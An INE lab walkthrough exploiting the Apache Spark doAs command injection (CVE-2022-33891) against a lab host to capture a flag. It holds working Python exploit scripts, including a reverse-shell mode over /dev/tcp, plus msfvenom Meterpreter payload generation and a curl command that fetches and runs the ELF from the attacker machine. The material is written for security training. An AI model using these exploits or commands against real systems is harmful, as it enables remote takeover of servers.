24 August 22

Lab Walkthrough - Apache Spark Shell Command Injection

Posted by INE

In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Purpose: We will learn how to exploit the Apache Spark shell command injection vulnerability with the help of the Metasploit Framework. We will also use Python to write and modify scripts that exploit the Apache Spark application.

Technical difficulty: Beginner

Introduction

In 2022, a critical shell command injection vulnerability was found in the Apache Spark server. The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that ultimately builds a Unix shell command based on their input and executes it. This results in arbitrary shell command execution as the user Spark is currently running as.

This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
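The version ranges above can be turned into a small check. This is a minimal sketch that assumes the version is a plain dotted string such as 3.1.1 (no suffixes like -SNAPSHOT); the function names are illustrative and not part of any Spark tooling.

```python
def parse_version(version: str) -> tuple:
    """Turn '3.1.1' into (3, 1, 1) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def is_affected(version: str) -> bool:
    """Return True if the version falls in one of the affected ranges listed above."""
    v = parse_version(version)
    return (
        v <= (3, 0, 3)
        or (3, 1, 1) <= v <= (3, 1, 2)
        or (3, 2, 0) <= v <= (3, 2, 1)
    )


if __name__ == "__main__":
    for candidate in ("2.4.8", "3.1.1", "3.1.3", "3.2.1", "3.3.0"):
        print(candidate, "affected" if is_affected(candidate) else "not affected")
```

A version being in range only means the vulnerable code is present; the issue is reachable only when ACLs are enabled.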

The vulnerability was discovered by Kostya Kortchinsky, a cybersecurity researcher from Databricks.

Read More: https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc

What is Command Injection?

Command injection is a cyberattack that involves running unauthorized commands on the host operating system. Usually, the threat actor injects the commands by taking advantage of an application flaw, such as inadequate input validation.

Lab Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/0bc4e7a4-7959-4531-b0fd-ab38764a48c7

apache_spark_lab_link.png

Lab Environment

In this lab environment, the user will access a Kali GUI instance. A vulnerable Apache Spark instance is deployed at http://demo.ine.local:8080

Goal after completing this scenario: Access the /flag.txt file and read the flag!

apache_spark_0.png

Tools

The best tools for this lab are:

  • Nmap

  • Bash Shell

  • Metasploit Framework

  • Python

What is Apache Spark?

Apache Spark is a multi-language engine for executing data engineering, data science, and machine learning on single-node machines or clusters.

Apache Spark Key features

Batch/streaming data

Unify the processing of your data in batches and real-time streaming, using your preferred language: Python, SQL, Scala, Java or R.

SQL analytics

Execute fast, distributed ANSI SQL queries for dashboarding and ad-hoc reporting. Runs faster than most data warehouses.

Data science at scale

Perform Exploratory Data Analysis (EDA) on petabyte-scale data without having to resort to downsampling

Machine learning

Train machine learning algorithms on a laptop and use the same code to scale to fault-tolerant clusters of thousands of machines.

Source: https://spark.apache.org/

Vulnerability Configuration

  • The vulnerable code path is only reachable when ACLs are enabled via the configuration option spark.acls.enable, e.g., in conf/spark-defaults.conf
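To audit a configuration for this precondition, the file can be scanned for the option. The sketch below is an assumption-laden helper, not part of Spark: it assumes key and value are separated by whitespace or by =, that # starts a comment, and that the last occurrence of the key wins. The sample configuration text is made up for illustration.

```python
def acls_enabled(conf_text: str) -> bool:
    """Return True if spark.acls.enable is set to true in the given config text."""
    enabled = False
    for raw_line in conf_text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        # Normalise 'key=value' to 'key value', then split key from value
        parts = line.replace("=", " ", 1).split(None, 1)
        if len(parts) == 2 and parts[0] == "spark.acls.enable":
            enabled = parts[1].strip().lower() == "true"
    return enabled


if __name__ == "__main__":
    # Hypothetical spark-defaults.conf content
    sample = "# example\nspark.master spark://host:7077\nspark.acls.enable true\n"
    print("ACLs enabled:", acls_enabled(sample))
```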

Vulnerable Source Code

Link: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

private def getUnixGroups(username: String): Set[String] = {
-    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
   // we need to get rid of the trailing "\n" from the result of command execution
-    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+   Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
 }
}
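The difference between the removed and added lines can be sketched in Python by building the two argument vectors without running them. This is an illustration only: the function names are hypothetical, and the default id_path value stands in for idPath, whose definition is not shown in the excerpt above.

```python
def vulnerable_argv(username: str) -> list:
    """Mirror the removed lines: the name is concatenated into a 'bash -c' string."""
    return ["bash", "-c", "id -Gn " + username]


def fixed_argv(username: str, id_path: str = "id") -> list:
    """Mirror the added line: the name is one argument to id, and no shell is involved."""
    return [id_path, "-Gn", username]


if __name__ == "__main__":
    payload = "`id`"
    # bash receives the whole string and evaluates the backticks before id runs
    print(vulnerable_argv(payload))
    # id receives the backticks as literal characters in a (nonexistent) user name
    print(fixed_argv(payload))
```

In the first form the shell parses attacker-controlled text; in the second the text never passes through a shell, so metacharacters have no special meaning.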

CVE-2022-33891

  • Vulnerable parameter

http://demo.ine.local:8080/?doAs=`[command injection here]`

The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by running a raw Linux command.

The value of ?doAs is processed on the server, but the command output is generally not reflected back on the page, so this is largely a blind OS command injection. Your commands run, but you usually get no indication of whether they succeeded, or even whether the program you are calling exists on the target.

The value passed in the ?doAs URL parameter is concatenated into cmdSeq, which starts a background bash process with the command line id -Gn followed by that value, so shell metacharacters such as backticks are evaluated by bash.

Source: https://www.socinvestigation.com/cve-2022-33891-apache-spark-shell-command-injection-detection-response
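Because the injection is blind, a common way to confirm execution is to compare response times with and without a sleep payload. The following is a minimal sketch of that decision logic only; the function names and the tolerance value are assumptions, and the demo uses local sleeps as stand-ins for real HTTP requests.

```python
import time
from typing import Callable


def timed(action: Callable[[], object]) -> float:
    """Run action() and return how long it took, in seconds."""
    start = time.monotonic()
    action()
    return time.monotonic() - start


def delay_suggests_execution(baseline: float, delayed: float,
                             sleep_seconds: float, tolerance: float = 2.0) -> bool:
    """True if the delayed request took roughly sleep_seconds longer than the baseline."""
    extra = delayed - baseline
    return abs(extra - sleep_seconds) <= tolerance


if __name__ == "__main__":
    # Stand-ins for two requests: a normal one and one carrying a sleep payload
    baseline = timed(lambda: time.sleep(0.05))
    delayed = timed(lambda: time.sleep(0.25))
    print(delay_suggests_execution(baseline, delayed, sleep_seconds=0.2, tolerance=0.1))
```

Measuring a baseline first helps avoid mistaking a slow network for a successful injection.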

Solution

Step 1: Open the lab link to access the Kali machine.

Kali machine

apache_spark_1.png

Step 2: Check if the provided machine is reachable.

Command:

ping -c 4 demo.ine.local
apache_spark_2.jpg

The provided machine is reachable.

Step 3: Check all open ports on the machine.

Command:

nmap demo.ine.local
apache_spark_3.jpg

Multiple ports are open. The Apache Spark server is running on port 8080.
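If Nmap is not available, a single port can be probed from Python. This is a minimal sketch using a plain TCP connect; the function name and the one-second timeout are illustrative choices, and it checks only one port rather than performing a scan.

```python
import socket


def is_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and name resolution failures
        return False


if __name__ == "__main__":
    print("8080 open:", is_port_open("demo.ine.local", 8080))
```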

Step 4: Open Firefox and browse to port 8080 to identify the Apache Spark server version.

URL: http://demo.ine.local:8080

apache_spark_4.jpg

apache_spark_4_1.jpg

The target Apache Spark server version is 3.1.1.
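The version can also be pulled out of the page source programmatically. The sketch below assumes the Spark UI renders the version inside an element with class "version"; that markup detail and the sample HTML are assumptions, so adjust the pattern to whatever the page actually contains.

```python
import re
from typing import Optional

# Assumed markup: <span class="version" ...>3.1.1</span>
VERSION_PATTERN = re.compile(r'class="version"[^>]*>\s*(\d+\.\d+\.\d+)')


def extract_spark_version(html: str) -> Optional[str]:
    """Return the dotted version found in the page, or None if it is absent."""
    match = VERSION_PATTERN.search(html)
    return match.group(1) if match else None


if __name__ == "__main__":
    # Hypothetical fragment of the Spark master page
    sample = '<span class="version" style="margin-right: 15px;">3.1.1</span>'
    print(extract_spark_version(sample))
```

The html argument could come from the body of a GET request to http://demo.ine.local:8080.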

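Step 5: Run a command on the target using the vulnerable parameter ?doAs.

Request the following URL from the Kali terminal, for example with curl, keeping the URL in single quotes so that the local shell does not expand the backticks itself.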

Command:

http://demo.ine.local:8080?doAs=`id`
apache_spark_5.jpg

The id command was executed on the target server, and its output was returned.

Note: You won’t receive the output of every Linux command.

This confirms that the target is vulnerable to CVE-2022-33891.

Step 6: Write an Nmap script that detects the vulnerable Spark version, i.e., 3.1.1

Nmap script

-- The Head Section --
description = [[The script to detect The Apache Spark Shell Command Injection vulnerability]]
---
-- @usage
-- nmap --script detect-spark-vuln <target>
-- @output
-- PORT   STATE SERVICE
-- 8080/tcp open  http
-- |_detect-spark-vuln: Apache Spark is Vulnerable to Command Injection
categories = {"default", "safe"}
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
-- The Rule Section --
portrule = shortport.http
-- The Action Section --
action = function(host, port)
   local uri = "/"
   local version = "3.1.1"
   local response = http.get(host, port, uri)
   -- Only inspect the body of a successful response
   if response and response.status == 200 and response.body then
       -- Plain-text search (4th argument true) so the dots are not treated as Lua pattern wildcards
       if string.find(response.body, version, 1, true) then
           return "Apache Spark is Vulnerable to Command Injection!!"
       else
           return "Apache Spark Not Vulnerable!!"
       end
   end
end

The script is straightforward. It requests the root page of each HTTP service Nmap finds (port 8080 on this target), searches the response for the given string, i.e., 3.1.1, and reports whether the server looks vulnerable. It is a version check only and does not attempt the injection.

Save the above code on the attacker’s machine and run it. The file extension should be .nse.

Commands:

nano detect-spark-vuln.nse

<paste code>

apache_spark_6.jpg

Run the script.

nmap --script detect-spark-vuln.nse demo.ine.local
apache_spark_6_1.jpg

Successfully detected Apache Spark server version 3.1.1 using a custom Nmap script.

Step 7: Run the Python script to detect the Apache Spark command injection vulnerability

Python Script

#!/usr/bin/env python3
import requests
import argparse
import base64
import datetime
from colorama import Fore
parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
parser.add_argument('--verbose', default=False, action="store_true", help="Verbose mode")
args = parser.parse_args()
# nothing to see here, move along!
headers = {
   'User-Agent': 'CVE-2022-33891 POC',
}
# Colors :D
info = (Fore.BLUE + "[*] " + Fore.RESET)
recc = (Fore.YELLOW + "[*] " + Fore.RESET)
good = (Fore.GREEN + "[+] " + Fore.RESET)
important = (Fore.CYAN + "[!] " + Fore.RESET)
printError = (Fore.RED + "[X] " + Fore.RESET)
full_url = f"{args.url}:{args.port}"
def check_for_vuln(url):
   try:
       print(info + "Attempting to connect to site...")
       r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False, headers=headers)
       if args.verbose:
           print(info + f"URL request: {url}/?doAs='testing'")
           print(info + f"Response status code: {r.status_code}")
       if r.status_code != 403:
           print(printError + "No ?doAs= endpoint. Does not look vulnerable.")
           quit(1)
       elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
           print(printError + "Does not look like an Apache Spark server.")
           quit(1)
       else:
           print(important + "Performing sleep test of 10 seconds...")
           t1 = datetime.datetime.now()
           if args.verbose:
               print(info + f"T1: {t1}")
           run_cmd("sleep 10")
           t2 = datetime.datetime.now()
           delta = t2-t1
           if args.verbose:
               print(info + f"T2: {t2}")
               print(info + f"Delta T: {delta.seconds}")
           if delta.seconds not in range(8,12):
               print(printError + "Sleep was less than 10. This target is probably not vulnerable")
           else:
               print(good + "Sleep was 10 seconds! This target is probably vulnerable!")
           exit(0)
   except Exception as e:
       print(printError + str(e))
def cmd_prompt():
   cmd = input("[cve-2022-33891> ")
   return cmd
def base64_encode(cmd):
   try:
       message_bytes = cmd.encode('ascii')
       base64_bytes = base64.b64encode(message_bytes)
       base64_cmd = base64_bytes.decode('ascii')
       return base64_cmd
   except Exception as e:
       print(printError +str(e))
def run_cmd(cmd):
   try:
       if args.verbose:
           print(info + "Command is: " + cmd)
       base64_cmd = base64_encode(cmd)
       if args.verbose:
           print(info + "Base64 command is: " + base64_cmd)
       exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
       exploit_req = f"{full_url}{exploit}"
       if args.verbose:
           print(info + "Full exploit request is: " + exploit_req)
           print(info + "Sending exploit...")
       r = requests.get(exploit_req, allow_redirects=False, headers=headers)
       if args.verbose:
           print(info + f"Response status code: {r.status_code}\n"+ info + "Hint: 403 is good.")
   except Exception as e:
       print(printError + str(e))
       quit(1)
def revshell(lhost, lport):
   print(info + f"Reverse shell mode.\n" + recc+ f"Set up your listener by entering the following:\nnc -nvlp {lport}")
   input(recc + "When your listener is set up, press enter!")
   rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
   run_cmd(rev_shell_cmd)
def main():
   try:
       if args.check and args.revshell:
           print(printError + "Please choose either revshell or check!")
           exit(1)
       elif args.check:
           check_for_vuln(full_url)
       # Revshell
       elif args.revshell:
           if not (args.listeninghost and args.listeningport):
               print(printError + "You need --listeninghost and --listeningport!")
               exit(1)
           else:
               lhost = args.listeninghost
               lport = args.listeningport
               revshell(lhost, lport)
       else:
           # "Interactive" mode
           print(info + "\"Interactive\" mode!\n" + important + "Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
           while True:
               command_to_run = cmd_prompt()
               run_cmd(command_to_run)
   except KeyboardInterrupt:
       print("\n"+ info + "Goodbye!")
if __name__ == "__main__":
   main()

Save the above code as PoC.py on the Kali machine and run it to check whether the target is vulnerable.

Check the script help option.

Command:

python3 PoC.py --help
apache_spark_7.jpg

Running the script to verify the vulnerability.

Command:

python3 PoC.py -u http://demo.ine.local -p 8080 --check --verbose
apache_spark_7_1.jpg

Target appears to be vulnerable.
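The PoC base64-encodes every command before placing it in the ?doAs value, presumably so that spaces, quotes, and other special characters survive the trip through the URL and the shell. The sketch below isolates that step; wrap_command mirrors the payload format used in run_cmd, while unwrap_command is a hypothetical helper added only to inspect a payload.

```python
import base64


def wrap_command(cmd: str) -> str:
    """Build the backtick payload that decodes cmd on the target and pipes it to bash."""
    encoded = base64.b64encode(cmd.encode("ascii")).decode("ascii")
    return f"`echo {encoded} | base64 -d | bash`"


def unwrap_command(payload: str) -> str:
    """Recover the original command from a payload, for inspection only."""
    encoded = payload.split()[1]  # the token right after '`echo'
    return base64.b64decode(encoded).decode("ascii")


if __name__ == "__main__":
    payload = wrap_command("sleep 10")
    print(payload)
    print(unwrap_command(payload))
```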

Step 8: Write a simpler Python script to execute commands on the target server

Python Script

import argparse
import base64
import sys

import requests

my_parser = argparse.ArgumentParser(description='Apache Spark Command Injection')
my_parser.add_argument('-T', '--URL', type=str, required=True, help='Target base URL')
args = my_parser.parse_args()
target = args.URL
def shell(target):
   url = target
   # Make sure the Spark UI is reachable before sending any payload
   r = requests.get(target)
   if r.status_code == 200:
       print("[+] Exploiting")
       print("[+] Getting the shell... :)")
       while True:
           try:
               command = input("# ")
               # Base64-encode the command so bash on the target can decode and run it
               command_to_encode = command.encode('ascii')
               base64_format = base64.b64encode(command_to_encode)
               base64_final_cmd = base64_format.decode('ascii')
               print("Base64 Command: " + base64_final_cmd)
               payload = f"/?doAs=`echo {base64_final_cmd} | base64 -d | bash`"
               exploiting = f"{url}{payload}"
               print(exploiting)
               # The injection is blind, so the response is not inspected
               requests.get(exploiting, allow_redirects=False)
               print("Command Executed")
           except KeyboardInterrupt:
               sys.exit("\nBye")
   else:
       print("[*] Some issue occurred.")
shell(target)

Save the above code as New-PoC.py on the Kali machine. We will use it to gain a Meterpreter session.

apache_spark_8.jpg

Check the Attacker Machine IP address:

Command:

ip addr
apache_spark_8_1.jpg

Generate a malicious ELF executable for the reverse connection.

Command:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.27.2 LPORT=4444 -f elf > shell.elf
file shell.elf
apache_spark_8_2.jpg

Start Python’s built-in HTTP server to serve the shell.elf file.

Command:

python3 -m http.server 80
apache_spark_8_3.jpg

Start Metasploit multi-handler for the new meterpreter session.

Command:

msfconsole -q
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.27.2
exploit
apache_spark_8_4.jpg

Check if the script is running correctly by checking its help option.

Command:

python3 New-PoC.py --help
apache_spark_8_5.jpg

It’s working fine. Run the script, then use curl to download the shell.elf file onto the target machine by exploiting the vulnerability.

Command:

python3 New-PoC.py --URL http://demo.ine.local:8080
apache_spark_8_6.jpg

Command (entered at the script’s # prompt):

curl http://10.10.27.2/shell.elf --output /tmp/shell.elf; chmod +x /tmp/shell.elf; /bin/bash -c "/tmp/shell.elf"
apache_spark_8_7.jpg

The shell.elf file was downloaded to the /tmp/ directory and executed on the target machine. Once shell.elf runs, we receive a Meterpreter session:

apache_spark_8_8.jpg

Step 9: Find the flag.

Command:

ls /
cat /flag.txt
apache_spark_9.jpg

FLAG: aad8ee70c54f1cc0c0aad082423b09fe

Mitigation

  • Upgrade to supported Apache Spark maintenance release 3.1.3, 3.2.2, or 3.3.0 or later


Try this lab for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!


© 2022 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.